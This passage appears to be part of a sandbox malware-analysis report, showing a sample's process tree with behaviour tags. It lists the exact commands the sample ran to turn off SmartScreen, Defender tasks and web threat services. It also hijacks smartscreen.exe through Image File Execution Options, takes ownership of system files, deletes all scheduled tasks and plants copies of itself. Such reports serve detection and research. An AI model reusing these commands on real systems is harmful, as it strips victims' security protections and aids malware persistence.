                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:2352
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:2092
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:1972
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:1600
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:1164
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:1816
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:1160
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:892
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:2472
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:1764
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:276
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:1260
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:2040
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f /reg:64
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:2860
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:808
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        C:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:3036
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          C:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:1484
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:2328
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              C:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:1800
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              C:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:2500
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                C:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:2828
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:1544
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:1720
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:2340
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:3044
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:2172
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              PID:2568
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                              C:\Windows\System32\sc.exe config webthreatdefsvc start= disabled
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                              PID:2188
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                              C:\Windows\System32\sc.exe config webthreatdefusersvc start= disabled
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                              PID:1840
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                              C:\Windows\System32\takeown.exe /s VORHPBAB /u Admin /f "C:\Windows\System32\smartscreen.exe"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:1964
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              C:\Windows\System32\icacls.exe "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:3016
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                              C:\Windows\System32\taskkill.exe /im smartscreen.exe /f
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:2780
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\*.*"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                              PID:2776
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:1356
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                PID:1244
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:1744
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:1040
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:2412
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:924
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:1348
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                    xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                    PID:2308
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:2184
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                      xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:2364
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:1532
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                        xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        PID:1664
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:928
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                          xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          PID:3056
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:1668
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                            xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:1944
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:1524
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                              xcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                              PID:1048
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:1772
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                xcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                PID:2088
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:1360
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                xcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                PID:2508
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:2664
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                  xcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  PID:2544
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1872
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_OK.ini"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1680
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_ERRO.ini"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:2380
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1000
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1716
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:592
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:372
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:908
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1552
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe +h +r +s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:2144
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe +h +r +s "C:\Windows\SysWOW64\en\*.lst"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:772
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\L2cache"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:2572
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:2368
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:1588
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      • Kills process with WMI
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:564
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      • Kills process with WMI
                                                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Kills process with WMI
                                                                                                                                                                                                                                                      PID:2344
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Kills process with WMI
                                                                                                                                                                                                                                                      PID:1700
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Kills process with WMI
                                                                                                                                                                                                                                                      PID:1308
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Kills process with WMI
                                                                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                      PID:2892
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.lst"
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe service where "name like 'Intel(R) Utiliti'" call stopservice
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:2896
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Intel(R) Utiliti'" Call Delete
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:2716
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe stop "Intel(R) Utiliti"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                          PID:2624
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\SC.exe DELETE "Intel(R) Utiliti"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                          PID:2424
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /Delete /TN * /F
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:2804
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:2868
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:2656
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:2064
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe +h +r +s "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                            PID:2708
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                            8⤵
